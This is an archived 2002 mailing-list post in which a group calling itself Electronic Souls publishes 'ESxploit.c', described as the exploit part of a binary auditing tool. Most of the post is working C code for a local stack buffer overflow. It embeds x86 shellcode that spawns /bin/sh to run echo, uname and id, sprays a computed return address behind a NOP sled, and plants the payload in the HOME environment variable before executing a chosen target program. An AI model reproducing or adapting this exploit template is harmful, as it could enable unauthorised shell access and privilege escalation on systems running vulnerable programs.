| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200211290634.gAT6YIpT051089@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Advances in Binary Auditing (PART TWO)
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
We apologize for our oversight; in the first message sent titled 'Advances in Binary Auditing', we neglected to include the exploit portion of the auditing tool.
Here it is, enjoy, and do not abuse the knowledge!
# cat ESxploit.c
/* Exploit part of ESxploit,
* local bof testing application
* (C) BrainStorm - ElectronicSouls
*/
#define DEF_OFFSET 10
static char exec[]=
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65"
"\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73"
"\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b"
"\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[3000];
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEF_OFFSET;}
ret=(esp()-offset);
printf(" *** ESxploit - BOF testing application \n");
printf(" *** Return Address: 0x%lx, Offset: %d. ",ret,offset);
printf("\n\n");
for(i=1;i<241;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(237-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
setenv("HOME", bof, 1);
execlp(argv[2], argv[3], bof, 0);
}
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"The winner won the race."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nCnIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltz/kAoJkSeE6eMaIk
wS7lssZ1RkKSsTr/AKC+SiYXzT8OO8/2k/TirxHfVYyeaw==
=lfo+
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists